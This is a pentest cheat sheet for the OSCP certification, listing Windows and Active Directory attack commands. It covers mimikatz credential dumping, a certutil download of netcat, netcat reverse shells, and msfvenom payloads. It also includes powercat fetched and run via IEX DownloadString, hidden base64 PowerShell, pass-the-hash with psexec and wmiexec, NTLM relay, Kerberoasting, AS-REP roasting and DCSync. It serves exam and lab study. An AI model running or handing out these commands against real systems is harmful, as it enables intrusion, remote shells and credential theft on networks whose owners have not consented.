Skip to content

OSCP Windows Commands Cheat Sheet

Bloodhound

Shortest Path to Domain Admins

MATCH p=shortestPath((n)-[:Owns|GenericAll|GenericWrite|WriteOwner|WriteDacl|MemberOf|ForceChangePassword|AllExtendedRights|AddMember|HasSession|Contains|GPLink|AllowedToDelegate|TrustedBy|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|HasSIDHistory|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|SQLAdmin|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|GoldenCert|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC5|ADCSESC6a|ADCSESC6b|ADCSESC7|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|DCFor*1..]->(g:Group)) WHERE g.objectid ENDS WITH "-512" AND n<>g RETURN p

mimikatz

.\mimikatz  

privilege::debug
token::elevate

"sekurlsa::logonpasswords" exit 

lsadump::lsa 

lsadump::sam 

lsadump::secrets 

sekurlsa::logonpasswords 

lsadump::cache

To Find SAM and SYSTEM files from the Backup

Get-ChildItem -Path . -Recurse -Filter *system* -File
Get-ChildItem -Path . -Recurse -Filter *sam* -File

To Enable RDP on the Machine:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Sharing files to and from from windows

On kali Linux

impacket-smbserver share $(pwd) -smb2support -user offsec -password lab

On Machine

net use \\<HOST_IP>\share /u:user password

or

$pass = ConvertTo-SecureString 'lab' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('offsec', $pass)
New-PSDrive -Name share -PSProvider FileSystem -Credential $cred -Root \\<HOST_IP>\share

PowerShell

To check weather a User exists locally on the System

Get-LocalUser

Properties of a User

net user paul

To get Account Policy

net accounts

Check Local Administrators

net localgroup administrators

Winpeas

cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server

iwr -uri http://<LOCAL_IP>/winPEASx64.exe -Outfile winPEAS.exe

Check what services you can start

accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula

Reverse Shell

To Download Reverse shell

certutil -urlcache -f http://kali_ip/nc64.exe c:/windows/temp/nc64.exe

To run the Reverse shell

c:/windows/temp/nc64.exe -e powershell <HOST_IP> <HOST_PORT>

Generating Reverse Shell using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<HOST_IP> LPORT=443 -f exe -o rshell.exe

Alternatively we can do as follows:

msfvenom -p windows/shell_reverse_tcp LHOST=<HOST_IP> LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

PowerUp

cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .

DOwnloading

iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1

Running the PowerUp

powershell -ep bypass
. .\PowerUp.ps1

Invoke-All Checks

Invoke-AllChecks

Get Service Binary Hijacking

Get-ModifiableServiceFile

DLL Hijacking perform manually Service DLL Hijacking

Get Unquoted Service Paths

Get-UnquotedService

Powercat

Powercat is a PowerShell implementation of Netcat ( Usually to get the reverse shells)

Copy Powercat to present directory:

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

Downloading of Powercat FIle

IEX (New-Object System.Net.Webclient).DownloadString("http://<HOST_IP>/powercat.ps1");powercat -c <HOST_IP> -p <HOST_PORT> -e powershell

To execute powercat downloading and running on powershell using base64 encoded payload

powershell.exe -nop -w hidden -e <Base64 encoded>

Powershell Reverse Shell - https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

For Reverse Shell - ASPX - https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx

To Convert to Base64 using powershell ( DO not use Cyberchef -Why?)

$Text = "TEXT TO BE CONVERTED"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

Powerview - To Enumerate AD

Import Power-view

cp /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/powerview.ps1 .

powershell.exe -ep bypass
Import-Module .\PowerView.ps1

Get Current Domain

Get-NetDomain

List all users in the Domain

Get-NetUser

#To Further filter out for one specific filed
Get-NetUser | select cn

List all Groups

Get-NetGroup

#List specific things
Get-NetGroup | select cn
Get-NetGroup "Sales Department" | select member

To get Computer Objects in the Domain

Get-NetComputer

#Filter 
Get-NetComputer | select operatingsystem,dnshostname

Scanning domain to find local administrative privileges for our user

Find-LocalAdminAccess

Check logged in users 

Get-NetSession -ComputerName files04
Get-NetSession -ComputerName files04 -Verbose

Enumerating Service Accounts

setspn -L iis_service

Get-NetUser -SPN
#Filter for specifics
Get-NetUser -SPN | select samaccountname,serviceprincipalname

To get or enumerate Access Control Entries

Get-ObjectAcl

#For specific user 
Get-ObjectAcl -Identity stephanie

To convert the SID to Name we can use

Convert-SidToName <SID>

#Example
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104

SecurityIdentifier - find out who has the ReadProperty permission

Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553

Enumerating ACL's for Management Groups

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

#Further we can convert these SID's to name as above

To FInd Domain Shares

Find-DomainShare

# Explore SYSVOL ->  %SystemRoot%\SYSVOL\Sysvol\domain-name

Impacket

Connecting to MSSQL Database

impacket-mssqlclient <USERNAME>:<PASSWORD>@<HOST_IP> -windows-auth

wmiexec -> Administrator psexec -> always receive a shell as SYSTEM instead of User

Impacket pxec using Password Hash

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

Wmiexec

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

NTLM Replaying ATtack 

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc <Reversehsell One Liner>"

AS-REP Roasting

impacket-GetNPUsers -dc-ip <DC_IP>  -request -outputfile hashes.asreproast <domain>/<user>

Kerberoasting

sudo impacket-GetUserSPNs -request -dc-ip <DC_IP> <domain>/<user>

DC Sync attack

impacket-secretsdump -just-dc-user <randomuser> <domain>/<domainadmin>@<theirpassword>@192.168.50.70

Other Tips

If you use runas to open powershell, you need to claim your admin stuff as follows:

Start-Process powershell.exe -Verb runAs

nc.exe

find / -name nc.exe 2>/dev/null

Get NT Authority Level

powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
> Medium(example output)

Potato Exploits - Using Exploits

Windows PE - https://github.com/gtworek/Priv2Admin AD PE - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse

Kerberos Cheat sheet - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits